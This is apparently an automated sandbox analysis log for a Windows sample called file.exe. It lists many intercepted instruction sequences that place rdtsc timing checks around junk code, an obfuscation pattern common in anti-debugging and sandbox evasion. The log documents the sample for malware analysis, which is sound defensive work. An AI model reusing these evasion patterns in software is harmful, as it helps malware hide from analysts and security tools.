Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53C05FF second address: 53C0604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53C0604 second address: 53C060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0332 second address: 53A0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD2884F85D1h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FD2884F85D1h 0x0000000f sbb si, 1946h 0x00000014 jmp 00007FD2884F85D1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD2884F85CDh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0383 second address: 53A0389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0389 second address: 53A03D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD2884F85CFh 0x00000013 sub cx, 05DEh 0x00000018 jmp 00007FD2884F85D9h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov si, 10FDh 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A03D9 second address: 53A0451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD288CC4A6Fh 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov esi, 172602ABh 0x00000013 pushfd 0x00000014 jmp 00007FD288CC4A70h 0x00000019 sbb al, 00000038h 0x0000001c jmp 00007FD288CC4A6Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD288CC4A6Bh 0x0000002d add eax, 26C2E5FEh 0x00000033 jmp 00007FD288CC4A79h 0x00000038 popfd 0x00000039 popad 0x0000003a and dword ptr [eax], 00000000h 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0451 second address: 53A0455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0455 second address: 53A0459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0459 second address: 53A045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538043C second address: 5380471 instructions: 0x00000000 rdtsc 0x00000002 mov dh, DFh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bl, ah 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b mov ecx, 617CF3AFh 0x00000010 mov bl, ah 0x00000012 popad 0x00000013 mov dword ptr [esp], ebp 0x00000016 jmp 00007FD288CC4A77h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380471 second address: 5380475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5380475 second address: 538047B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538047B second address: 5380498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E40 second address: 5390E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E44 second address: 5390E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E48 second address: 5390E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E4E second address: 5390E6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5390E6D second address: 5390E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0102 second address: 53A013A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD2884F85CDh 0x00000013 jmp 00007FD2884F85CBh 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A013A second address: 53A013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A013F second address: 53A0155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0155 second address: 53A0159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A0159 second address: 53A01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FD2884F85D3h 0x00000011 pop eax 0x00000012 pushfd 0x00000013 jmp 00007FD2884F85D9h 0x00000018 xor esi, 5E7FE226h 0x0000001e jmp 00007FD2884F85D1h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01AC second address: 53A01D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD288CC4A6Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01D1 second address: 53A01D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01D7 second address: 53A01DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A01DB second address: 53A01F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov bx, BE28h 0x0000000f pushad 0x00000010 mov edi, 0A00A972h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D24 second address: 53B0D60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD288CC4A6Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FD288CC4A70h 0x00000016 xchg eax, ecx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D60 second address: 53B0D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D64 second address: 53B0D86 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FD288CC4A72h 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D86 second address: 53B0D8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D8A second address: 53B0D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D90 second address: 53B0D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D96 second address: 53B0D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0D9A second address: 53B0E11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [774365FCh] 0x0000000d pushad 0x0000000e push esi 0x0000000f pushfd 0x00000010 jmp 00007FD2884F85CFh 0x00000015 or ax, A27Eh 0x0000001a jmp 00007FD2884F85D9h 0x0000001f popfd 0x00000020 pop esi 0x00000021 mov ax, di 0x00000024 popad 0x00000025 test eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FD2884F85D4h 0x00000030 jmp 00007FD2884F85D5h 0x00000035 popfd 0x00000036 movzx ecx, bx 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E11 second address: 53B0E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FD2FACC75ADh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E2C second address: 53B0E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E31 second address: 53B0E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b jmp 00007FD288CC4A70h 0x00000010 xor eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 push edi 0x00000015 pushfd 0x00000016 jmp 00007FD288CC4A6Ah 0x0000001b sbb ecx, 338C83C8h 0x00000021 jmp 00007FD288CC4A6Bh 0x00000026 popfd 0x00000027 pop ecx 0x00000028 mov esi, ebx 0x0000002a popad 0x0000002b and ecx, 1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov cx, F5D3h 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E90 second address: 53B0E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ror eax, cl 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0E9E second address: 53B0EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0EA2 second address: 53B0EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0EB8 second address: 53B0F31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007FD288CC4A76h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00BA2014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007FD28D515887h 0x0000002a push FFFFFFFEh 0x0000002c jmp 00007FD288CC4A70h 0x00000031 pop eax 0x00000032 jmp 00007FD288CC4A70h 0x00000037 ret 0x00000038 nop 0x00000039 push eax 0x0000003a call 00007FD28D5158A4h 0x0000003f mov edi, edi 0x00000041 jmp 00007FD288CC4A70h 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FD288CC4A77h 0x0000004e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F31 second address: 53B0F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2884F85D4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F49 second address: 53B0F7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD288CC4A79h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F7B second address: 53B0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F7F second address: 53B0F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0F83 second address: 53B0F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370007 second address: 5370060 instructions: 0x00000000 rdtsc 0x00000002 mov dh, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 mov si, B667h 0x0000000b pop eax 0x0000000c popad 0x0000000d push ebp 0x0000000e pushad 0x0000000f mov eax, 1DC8E675h 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 mov dword ptr [esp], ebp 0x0000001b jmp 00007FD288CC4A6Dh 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov ax, 0DE3h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushfd 0x0000002a jmp 00007FD288CC4A76h 0x0000002f xor si, C628h 0x00000034 jmp 00007FD288CC4A6Bh 0x00000039 popfd 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370060 second address: 537009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 and esp, FFFFFFF8h 0x00000008 jmp 00007FD2884F85D5h 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2884F85D8h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537009A second address: 537009E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537009E second address: 53700A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700A4 second address: 53700D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 jmp 00007FD288CC4A78h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD288CC4A6Eh 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700D6 second address: 53700DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700DC second address: 53700E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53700E0 second address: 5370102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007FD2884F85D5h 0x00000011 pop ecx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370102 second address: 5370167 instructions: 0x00000000 rdtsc 0x00000002 mov al, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FD288CC4A6Ah 0x0000000c jmp 00007FD288CC4A75h 0x00000011 popfd 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 jmp 00007FD288CC4A6Eh 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d movzx ecx, bx 0x00000020 pushfd 0x00000021 jmp 00007FD288CC4A79h 0x00000026 jmp 00007FD288CC4A6Bh 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370167 second address: 53701C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FD2884F85CEh 0x0000000f mov ebx, dword ptr [ebp+10h] 0x00000012 jmp 00007FD2884F85D0h 0x00000017 xchg eax, esi 0x00000018 jmp 00007FD2884F85D0h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD2884F85CEh 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701C8 second address: 53701DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD288CC4A6Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701DA second address: 53701DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701DE second address: 53701F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD288CC4A6Ah 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701F3 second address: 53701F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53701F9 second address: 537021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD288CC4A74h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 537021A second address: 5370247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 2B612154h 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FD2884F85D4h 0x00000013 mov dword ptr [esp], edi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b mov esi, edi 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370247 second address: 53702EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 pushfd 0x00000007 jmp 00007FD288CC4A77h 0x0000000c or si, 2DFEh 0x00000011 jmp 00007FD288CC4A79h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dx, si 0x00000021 movzx ecx, bx 0x00000024 popad 0x00000025 pushfd 0x00000026 jmp 00007FD288CC4A6Bh 0x0000002b add si, 800Eh 0x00000030 jmp 00007FD288CC4A79h 0x00000035 popfd 0x00000036 popad 0x00000037 je 00007FD2FAD02DBDh 0x0000003d pushad 0x0000003e mov ecx, 614CD7B3h 0x00000043 mov si, 3C0Fh 0x00000047 popad 0x00000048 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000004f pushad 0x00000050 movzx ecx, bx 0x00000053 mov di, 36A0h 0x00000057 popad 0x00000058 je 00007FD2FAD02DB2h 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53702EB second address: 53702EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53702EF second address: 53702F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53702F5 second address: 5370362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [esi+44h] 0x0000000c jmp 00007FD2884F85D6h 0x00000011 or edx, dword ptr [ebp+0Ch] 0x00000014 jmp 00007FD2884F85D0h 0x00000019 test edx, 61000000h 0x0000001f jmp 00007FD2884F85D0h 0x00000024 jne 00007FD2FA536900h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FD2884F85CAh 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370362 second address: 5370371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5370371 second address: 53703C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d jmp 00007FD2884F85CEh 0x00000012 jne 00007FD2FA5368C7h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FD2884F85CCh 0x00000021 sub ax, BD98h 0x00000026 jmp 00007FD2884F85CBh 0x0000002b popfd 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536097E second address: 5360984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360984 second address: 5360988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360988 second address: 536099F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD288CC4A6Ah 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536099F second address: 53609A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609A5 second address: 53609A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609A9 second address: 53609D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FD2884F85D6h 0x0000000e mov dword ptr [esp], ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD2884F85CAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609D9 second address: 53609DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609DD second address: 53609E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 53609E3 second address: 5360A0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e mov eax, edi 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, bx 0x00000018 mov edx, 1E3C8600h 0x0000001d popad 0x0000001e rdtsc
